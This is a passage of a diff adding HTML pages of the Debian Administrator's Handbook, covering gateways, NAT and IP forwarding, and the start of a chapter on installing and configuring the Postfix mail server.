+        href="https://debian-handbook.info/browse/cs-CZ/stable/network-infrastructure.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.power-management.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.virtual-private-network.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="network-infrastructure"></a>Kapitola 10. Network Infrastructure</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="network-infrastructure.html#sect.gateway">10.1. Gateway</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.virtual-private-network.html">10.2. Virtual Private Network</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.openvpn">10.2.1. OpenVPN</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.ssh-vpn">10.2.2. Virtual Private Network with SSH</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.ipsec">10.2.3. IPsec</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.virtual-private-network.html#sect.pptp">10.2.4. PPTP</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.quality-of-service.html">10.3. Quality of Service</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.quality-of-service.html#sect.qos-principe">10.3.1. Principle and Mechanism</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.quality-of-service.html#sect.qos-config">10.3.2. Configuring and Implementing</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.dynamic-routing.html">10.4. Dynamic Routing</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.ipv6.html">10.5. IPv6</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.ipv6.html#sect.ipv6-tunneling">10.5.1. Tunneling</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.domain-name-servers.html">10.6. Domain Name Servers (DNS)</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.domain-name-servers.html#sect.dns-principe">10.6.1. Principle and Mechanism</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.domain-name-servers.html#sect.dns-config">10.6.2. Configuring</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.dhcp.html">10.7. DHCP</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.dhcp.html#sect.dhcp-config">10.7.1. Configuring</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.dhcp.html#sect.dhcp-dns">10.7.2. DHCP and DNS</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.network-diagnosis-tools.html">10.8. Network Diagnosis Tools</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html#sect.netstat">10.8.1. Local Diagnosis: <code
+                        class="command">netstat</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html#sect.nmap">10.8.2. Remote Diagnosis: <code
+                        class="command">nmap</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-diagnosis-tools.html#sect.sniffers">10.8.3. Sniffers: <code
+                        class="command">tcpdump</code> and <code
+                        class="command">wireshark</code></a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Linux sports the whole Unix heritage for networking, and Debian provides a full set of tools to create and manage them. This chapter reviews these tools.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.gateway"></a>10.1. Gateway</h2></div></div></div><div
+            class="para">
+			A gateway is a system linking several networks. This term often refers to a local network's “exit point” on the mandatory path to all external IP addresses. The gateway is connected to each of the networks it links together, and acts as a router to convey IP packets between its various interfaces.
+		</div><a
+            id="id-1.13.4.3"
+            class="indexterm"></a><a
+            id="id-1.13.4.4"
+            class="indexterm"></a><a
+            id="id-1.13.4.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> IP packet</strong></p></div></div></div><a
+              id="id-1.13.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+			Most networks nowadays use the IP protocol (<span
+                class="emphasis"><em>Internet Protocol</em></span>). This protocol segments the transmitted data into limited-size packets. Each packet contains, in addition to its payload data, a number of details required for its proper routing.
+		</div></div><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.tcp-udp"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> TCP/UDP</strong></p></div></div></div><a
+              id="id-1.13.4.7.2"
+              class="indexterm"></a><a
+              id="id-1.13.4.7.3"
+              class="indexterm"></a><a
+              id="id-1.13.4.7.4"
+              class="indexterm"></a><a
+              id="id-1.13.4.7.5"
+              class="indexterm"></a><div
+              class="para">
+			Many programs do not handle the individual packets themselves, even though the data they transmit does travel over IP; they often use TCP (<span
+                class="emphasis"><em>Transmission Control Protocol</em></span>). TCP is a layer over IP allowing the establishment of connections dedicated to data streams between two points. The programs then only see an entry point into which data can be fed with the guarantee that the same data exits without loss (and in the same sequence) at the exit point at the other end of the connection. Although many kinds of errors can happen in the lower layers, they are compensated by TCP: lost packets are retransmitted, and packets arriving out of order (for example, if they used different paths) are re-ordered appropriately.
+		</div><div
+              class="para">
+			Another protocol relying on IP is UDP (<span
+                class="emphasis"><em>User Datagram Protocol</em></span>). In contrast to TCP, it is packet-oriented. Its goals are different: the purpose of UDP is only to transmit one packet from an application to another. The protocol does not try to compensate for possible packet loss on the way, nor does it ensure that packets are received in the same order as were sent. The main advantage to this protocol is that the latency is greatly improved, since the loss of a single packet does not delay the receiving of all following packets until the lost one is retransmitted.
+		</div><div
+              class="para">
+			TCP and UDP both involve ports, which are “extension numbers” for establishing communication with a given application on a machine. This concept allows keeping several different communications in parallel with the same correspondent, since these communications can be distinguished by the port number.
+		</div><div
+              class="para">
+			Some of these port numbers — standardized by the IANA (<span
+                class="emphasis"><em>Internet Assigned Numbers Authority</em></span>) — are “well-known” for being associated with network services. For instance, TCP port 25 is generally used by the email server. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.iana.org/assignments/port-numbers">http://www.iana.org/assignments/port-numbers</a></div>
+		</div></div><div
+            class="para">
+			When a local network uses a private address range (not routable on the Internet), the gateway needs to implement <span
+              class="emphasis"><em>address masquerading</em></span> so that the machines on the network can communicate with the outside world. The masquerading operation is a kind of proxy operating on the network level: each outgoing connection from an internal machine is replaced with a connection from the gateway itself (since the gateway does have an external, routable address), the data going through the masqueraded connection is sent to the new one, and the data coming back in reply is sent through to the masqueraded connection to the internal machine. The gateway uses a range of dedicated TCP ports for this purpose, usually with very high numbers (over 60000). Each connection coming from an internal machine then appears to the outside world as a connection coming from one of these reserved ports.
+		</div><a
+            id="id-1.13.4.9"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Private address range</strong></p></div></div></div><a
+              id="id-1.13.4.10.2"
+              class="indexterm"></a><a
+              id="id-1.13.4.10.3"
+              class="indexterm"></a><div
+              class="para">
+			RFC 1918 defines three ranges of IPv4 addresses not meant to be routed on the Internet but only used in local networks. The first one, <code
+                class="literal">10.0.0.0/8</code> (see sidebar <a
+                class="xref"
+                href="sect.network-config.html#sidebar.networking-basics"><span
+                  class="emphasis"><em>BACK TO BASICS</em></span> Essential network concepts (Ethernet, IP address, subnet, broadcast)</a>), is a class-A range (with 2<sup>24</sup> IP addresses). The second one, <code
+                class="literal">172.16.0.0/12</code>, gathers 16 class-B ranges (<code
+                class="literal">172.16.0.0/16</code> to <code
+                class="literal">172.31.0.0/16</code>), each containing 2<sup>16</sup> IP addresses. Finally, <code
+                class="literal">192.168.0.0/16</code> is a class-B range (grouping 256 class-C ranges, <code
+                class="literal">192.168.0.0/24</code> to <code
+                class="literal">192.168.255.0/24</code>, with 256 IP addresses each). <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc1918.html">http://www.faqs.org/rfcs/rfc1918.html</a></div>
+		</div></div><div
+            class="para">
+			The gateway can also perform two kinds of <span
+              class="emphasis"><em>network address translation</em></span> (or NAT for short). The first kind, <span
+              class="emphasis"><em>Destination NAT</em></span> (DNAT) is a technique to alter the destination IP address (and/or the TCP or UDP port) for a (generally) incoming connection. The connection tracking mechanism also alters the following packets in the same connection to ensure continuity in the communication. The second kind of NAT is <span
+              class="emphasis"><em>Source NAT</em></span> (SNAT), of which <span
+              class="emphasis"><em>masquerading</em></span> is a particular case; SNAT alters the source IP address (and/or the TCP or UDP port) of a (generally) outgoing connection. As for DNAT, all the packets in the connection are appropriately handled by the connection tracking mechanism. Note that NAT is only relevant for IPv4 and its limited address space; in IPv6, the wide availability of addresses greatly reduces the usefulness of NAT by allowing all “internal” addresses to be directly routable on the Internet (this does not imply that internal machines are accessible, since intermediary firewalls can filter traffic).
+		</div><a
+            id="id-1.13.4.12"
+            class="indexterm"></a><a
+            id="id-1.13.4.13"
+            class="indexterm"></a><a
+            id="id-1.13.4.14"
+            class="indexterm"></a><a
+            id="id-1.13.4.15"
+            class="indexterm"></a><a
+            id="id-1.13.4.16"
+            class="indexterm"></a><a
+            id="id-1.13.4.17"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Port forwarding</strong></p></div></div></div><a
+              id="id-1.13.4.18.2"
+              class="indexterm"></a><div
+              class="para">
+			A concrete application of DNAT is <span
+                class="emphasis"><em>port forwarding</em></span>. Incoming connections to a given port of a machine are forwarded to a port on another machine. Other solutions may exist for achieving a similar effect, though, especially at the application level with <code
+                class="command">ssh</code> (see <a
+                class="xref"
+                href="sect.remote-login.html#sect.ssh-port-forwarding">9.2.1.3 – „Creating Encrypted Tunnels with Port Forwarding“</a>) or <code
+                class="command">redir</code>.
+		</div></div><div
+            class="para">
+			Enough theory, let's get practical. Turning a Debian system into a gateway is a simple matter of enabling the appropriate option in the Linux kernel, by way of the <code
+              class="filename">/proc/</code> virtual filesystem:
+		</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>echo 1 &gt; /proc/sys/net/ipv4/conf/default/forwarding</code></strong></pre><div
+            class="para">
+			This option can also be automatically enabled on boot if <code
+              class="filename">/etc/sysctl.conf</code> sets the <code
+              class="literal">net.ipv4.conf.default.forwarding</code> option to <code
+              class="literal">1</code>.
+		</div><div
+            class="example"><a
+              xmlns=""
+              id="example.sysctl.conf"></a><p
+              class="title"><strong>Příklad 10.1. The <code
+                  class="filename">/etc/sysctl.conf</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+net.ipv4.conf.default.forwarding = 1
+net.ipv4.conf.default.rp_filter = 1
+net.ipv4.tcp_syncookies = 1
+</pre></div></div><div
+            class="para">
+			The same effect can be obtained for IPv6 by simply replacing <code
+              class="literal">ipv4</code> with <code
+              class="literal">ipv6</code> in the manual command and using the <code
+              class="literal">net.ipv6.conf.all.forwarding</code> line in <code
+              class="filename">/etc/sysctl.conf</code>.
+		</div><div
+            class="para">
+			Enabling IPv4 masquerading is a slightly more complex operation that involves configuring the <span
+              class="emphasis"><em>netfilter</em></span> firewall.
+		</div><div
+            class="para">
+			Similarly, using NAT (for IPv4) requires configuring <span
+              class="emphasis"><em>netfilter</em></span>. Since the primary purpose of this component is packet filtering, the details are listed in <a
+              class="xref"
+              href="security.html">14: „<em>Security</em>“</a> (see <a
+              class="xref"
+              href="sect.firewall-packet-filtering.html">14.2 – „Firewall or Packet Filtering“</a>).
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.power-management.html"><strong>Předcházející</strong>9.12. Power Management: Advanced Configuration an...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.virtual-private-network.html"><strong>Další</strong>10.2. Virtual Private Network</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/network-services.html b/tmp/cs-CZ/html/network-services.html
new file mode 100644
index 000000000..c02ef8369
--- /dev/null
+++ b/tmp/cs-CZ/html/network-services.html
@@ -0,0 +1,1151 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Postfix, Apache, NFS, Samba, Squid, OpenLDAP, SIP" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.network-diagnosis-tools.html"
+        title="10.8. Network Diagnosis Tools" /><link
+        rel="next"
+        href="sect.http-web-server.html"
+        title="11.2. Web Server (HTTP)" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/network-services.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-diagnosis-tools.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.http-web-server.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="network-services"></a>Kapitola 11. Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="network-services.html#sect.smtp-mail-server">11.1. Mail Server</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="network-services.html#id-1.14.4.7">11.1.1. Installing Postfix</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.configuring-virtual-domains">11.1.2. Configuring Virtual Domains</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.restrictions-for-receiving-and-sending">11.1.3. Restrictions for Receiving and Sending</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.setting-up-greylisting">11.1.4. Setting Up <span
+                        class="foreignphrase"><em
+                          class="foreignphrase">greylisting</em></span></a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#id-1.14.4.11">11.1.5. Customizing Filters Based On the Recipient</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.postfix-antivirus">11.1.6. Integrating an Antivirus</a></span></dt><dt><span
+                    class="section"><a
+                      href="network-services.html#sect.authenticated-smtp">11.1.7. Authenticated SMTP</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.http-web-server.html">11.2. Web Server (HTTP)</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.9">11.2.1. Installing Apache</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.10">11.2.2. Configuring Virtual Hosts</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.11">11.2.3. Common Directives</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-web-server.html#id-1.14.5.12">11.2.4. Log Analyzers</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.ftp-file-server.html">11.3. FTP File Server</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.nfs-file-server.html">11.4. NFS File Server</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html#id-1.14.7.10">11.4.1. Securing NFS</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html#id-1.14.7.11">11.4.2. NFS Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.nfs-file-server.html#id-1.14.7.12">11.4.3. NFS Client</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.windows-file-server-with-samba.html">11.5. Setting Up Windows Shares with Samba</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.windows-file-server-with-samba.html#id-1.14.8.9">11.5.1. Samba Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.windows-file-server-with-samba.html#id-1.14.8.10">11.5.2. Samba Client</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.http-ftp-proxy.html">11.6. HTTP/FTP Proxy</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html#id-1.14.9.8">11.6.1. Installing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html#id-1.14.9.9">11.6.2. Configuring a Cache</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.http-ftp-proxy.html#id-1.14.9.10">11.6.3. Configuring a Filter</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.ldap-directory.html">11.7. LDAP Directory</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html#id-1.14.10.7">11.7.1. Installing</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html#id-1.14.10.8">11.7.2. Filling in the Directory</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.ldap-directory.html#id-1.14.10.9">11.7.3. Managing Accounts with LDAP</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.rtc-services.html">11.8. Real-Time Communication Services</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.rtc-dns-settings">11.8.1. DNS settings for RTC services</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.turn-server">11.8.2. TURN Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.sip-server">11.8.3. SIP Proxy Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.xmpp-server">11.8.4. XMPP Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.rtc-port-443">11.8.5. Running services on port 443</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.rtc-services.html#sect.rtc-webrtc">11.8.6. Adding WebRTC</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Network services are the programs that users interact with directly in their daily work. They are the tip of the information system iceberg, and this chapter focuses on them; the hidden parts they rely on are the infrastructure we already described.
+	</div><div
+            class="para">
+		Many modern network services require encryption technology to operate reliably and securely, especially when used on the public Internet. X.509 Certificates (which may also be referred to as SSL Certificates or TLS Certificates) are frequently used for this purpose. A certificate for a specific domain can often be shared between more than one of the services discussed in this chapter.
+	</div><a
+            id="id-1.14.3.3"
+            class="indexterm"></a><a
+            id="id-1.14.3.4"
+            class="indexterm"></a><a
+            id="id-1.14.3.5"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.smtp-mail-server"></a>11.1. Mail Server</h2></div></div></div><div
+            class="para">
+			The Falcot Corp administrators selected Postfix for the electronic mail server, due to its reliability and its ease of configuration. Indeed, its design enforces that each task is implemented in a process with the minimum set of required permissions, which is a great mitigation measure against security problems.
+		</div><a
+            id="id-1.14.4.3"
+            class="indexterm"></a><a
+            id="id-1.14.4.4"
+            class="indexterm"></a><a
+            id="id-1.14.4.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> The Exim4 server</strong></p></div></div></div><a
+              id="id-1.14.4.6.2"
+              class="indexterm"></a><div
+              class="para">
+			Debian uses Exim4 as the default email server (which is why the initial installation includes Exim4). The configuration is provided by a separate package, <span
+                class="pkg pkg">exim4-config</span>, and automatically customized based on the answers to a set of Debconf questions very similar to the questions asked by the <span
+                class="pkg pkg">postfix</span> package.
+		</div><div
+              class="para">
+			The configuration can be either in one single file (<code
+                class="filename">/etc/exim4/exim4.conf.template</code>) or split across a number of configuration snippets stored under <code
+                class="filename">/etc/exim4/conf.d/</code>. In both cases, the files are used by <code
+                class="command">update-exim4.conf</code> as templates to generate <code
+                class="filename">/var/lib/exim4/config.autogenerated</code>. The latter is the file used by Exim4. Thanks to this mechanism, values obtained through Exim's debconf configuration — which are stored in <code
+                class="filename">/etc/exim4/update-exim4.conf.conf</code> — can be injected in Exim's configuration file, even when the administrator or another package has altered the default Exim configuration.
+		</div><div
+              class="para">
+			The Exim4 configuration file syntax has its peculiarities and its learning curve; however, once these peculiarities are understood, Exim4 is a very complete and powerful email server, as evidenced by the tens of pages of documentation. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.exim.org/docs.html">http://www.exim.org/docs.html</a></div>
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.4.7"></a>11.1.1. Installing Postfix</h3></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">postfix</span> package includes the main SMTP daemon. Other packages (such as <span
+                class="pkg pkg">postfix-ldap</span> and <span
+                class="pkg pkg">postfix-pgsql</span>) add extra functionality to Postfix, including access to mapping databases. You should only install them if you know that you need them.
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.smtp"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BACK TO BASICS</em></span> SMTP</strong></p></div></div></div><a
+                id="id-1.14.4.7.3.2"
+                class="indexterm"></a><a
+                id="id-1.14.4.7.3.3"
+                class="indexterm"></a><a
+                id="id-1.14.4.7.3.4"
+                class="indexterm"></a><div
+                class="para">
+				SMTP (<span
+                  class="emphasis"><em>Simple Mail Transfer Protocol</em></span>) is the protocol used by mail servers to exchange and route emails.
+			</div></div><div
+              class="para">
+				Several Debconf questions are asked during the installation of the package. The answers allow generating a first version of the <code
+                class="filename">/etc/postfix/main.cf</code> configuration file.
+			</div><div
+              class="para">
+				The first question deals with the type of setup. Only two of the proposed answers are relevant in case of an Internet-connected server, “Internet site” and “Internet with smarthost”. The former is appropriate for a server that receives incoming email and sends outgoing email directly to its recipients, and is therefore well-adapted to the Falcot Corp case. The latter is appropriate for a server receiving incoming email normally, but that sends outgoing email through an intermediate SMTP server — the “smarthost” — rather than directly to the recipient's server. This is mostly useful for individuals with a dynamic IP address, since many email servers reject messages coming straight from such an IP address. In this case, the smarthost will usually be the ISP's SMTP server, which is always configured to accept email coming from the ISP's customers and forward it appropriately. This setup (with a smarthost) is also relevant for servers that are not permanently connected to the internet, since it avoids having to manage a queue of undeliverable messages that need to be retried later.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> ISP</strong></p></div></div></div><a
+                id="id-1.14.4.7.6.2"
+                class="indexterm"></a><div
+                class="para">
+				ISP is the acronym for “Internet Service Provider”. It covers an entity, often a commercial company, that provides Internet connections and the associated basic services (email, news and so on).
+			</div><div
+                class="para">
+			</div></div><div
+              class="para">
+				The second question deals with the full name of the machine, used to generate email addresses from a local user name; the full name of the machine ends up as the part after the at-sign (“@”). In the case of Falcot, the answer should be <code
+                class="literal">mail.falcot.com</code>. This is the only question asked by default, but the configuration it leads to is not complete enough for the needs of Falcot, which is why the administrators run <code
+                class="command">dpkg-reconfigure postfix</code> so as to be able to customize more parameters.
+			</div><div
+              class="para">
+				One of the extra questions asks for all the domain names related to this machine. The default list includes its full name as well as a few synonyms for <code
+                class="literal">localhost</code>, but the main <code
+                class="literal">falcot.com</code> domain needs to be added by hand. More generally, this question should usually be answered with all the domain names for which this machine should serve as an MX server; in other words, all the domain names for which the DNS says that this machine will accept email. This information ends up in the <code
+                class="literal">mydestination</code> variable of the main Postfix configuration file — <code
+                class="filename">/etc/postfix/main.cf</code>.
+			</div><a
+              id="id-1.14.4.7.9"
+              class="indexterm"></a><a
+              id="id-1.14.4.7.10"
+              class="indexterm"></a><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.14.4.7.11"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/mail-server.png"
+                    alt="Role of the DNS MX record while sending a mail" /></div></div><p
+                class="title"><strong>Obrázek 11.1. Role of the DNS <span
+                    class="emphasis"><em>MX</em></span> record while sending a mail</strong></p></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>EXTRA</em></span> Querying the MX records</strong></p></div></div></div><div
+                class="para">
+				When the DNS does not have an MX record for a domain, the email server will try sending the messages to the host itself, by using the matching A record (or AAAA in IPv6).
+			</div></div><div
+              class="para">
+				In some cases, the installation can also ask what networks should be allowed to send email via the machine. In its default configuration, Postfix only accepts emails coming from the machine itself; the local network will usually be added. The Falcot Corp administrators added <code
+                class="literal">192.168.0.0/16</code> to the default answer. If the question is not asked, the relevant variable in the configuration file is <code
+                class="literal">mynetworks</code>, as seen in the example below.
+			</div><div
+              class="para">
+				Local email can also be delivered through <code
+                class="command">procmail</code>. This tool allows users to sort their incoming email according to rules stored in their <code
+                class="filename">~/.procmailrc</code> file.
+			</div><a
+              id="id-1.14.4.7.15"
+              class="indexterm"></a><a
+              id="id-1.14.4.7.16"
+              class="indexterm"></a><a
+              id="id-1.14.4.7.17"
+              class="indexterm"></a><div
+              class="para">
+				After this first step, the administrators got the following configuration file; it will be used as a starting point for adding some extra functionality in the next sections.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.4.7.19"></a><p
+                class="title"><strong>Příklad 11.1. Initial <code
+                    class="filename">/etc/postfix/main.cf</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# See /usr/share/postfix/main.cf.dist for a commented, more complete version
+
+
+# Debian specific:  Specifying a file name will cause the first
+# line of that file to be used as the name.  The Debian default
+# is /etc/mailname.
+#myorigin = /etc/mailname
+
+smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU)
+biff = no
+
+# appending .domain is the MUA's job.
+append_dot_mydomain = no
+
+# Uncomment the next line to generate "delayed mail" warnings
+#delay_warning_time = 4h
+
+readme_directory = no
+
+# TLS parameters
+smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
+smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
+smtpd_use_tls=yes
+smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
+smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
+
+# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
+# information on enabling SSL in the smtp client.
+
+smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
+myhostname = mail.falcot.com
+alias_maps = hash:/etc/aliases
+alias_database = hash:/etc/aliases
+myorigin = /etc/mailname
+mydestination = mail.falcot.com, falcot.com, localhost.localdomain, localhost
+relayhost = 
+mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 192.168.0.0/16
+mailbox_command = procmail -a "$EXTENSION"
+mailbox_size_limit = 0
+recipient_delimiter = +
+inet_interfaces = all
+inet_protocols = all
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>SECURITY</em></span> <span
+                          class="emphasis"><em>Snake oil</em></span> SSL certificates</strong></p></div></div></div><div
+                class="para">
+				The <span
+                  class="emphasis"><em>snake oil</em></span> certificates, like the <span
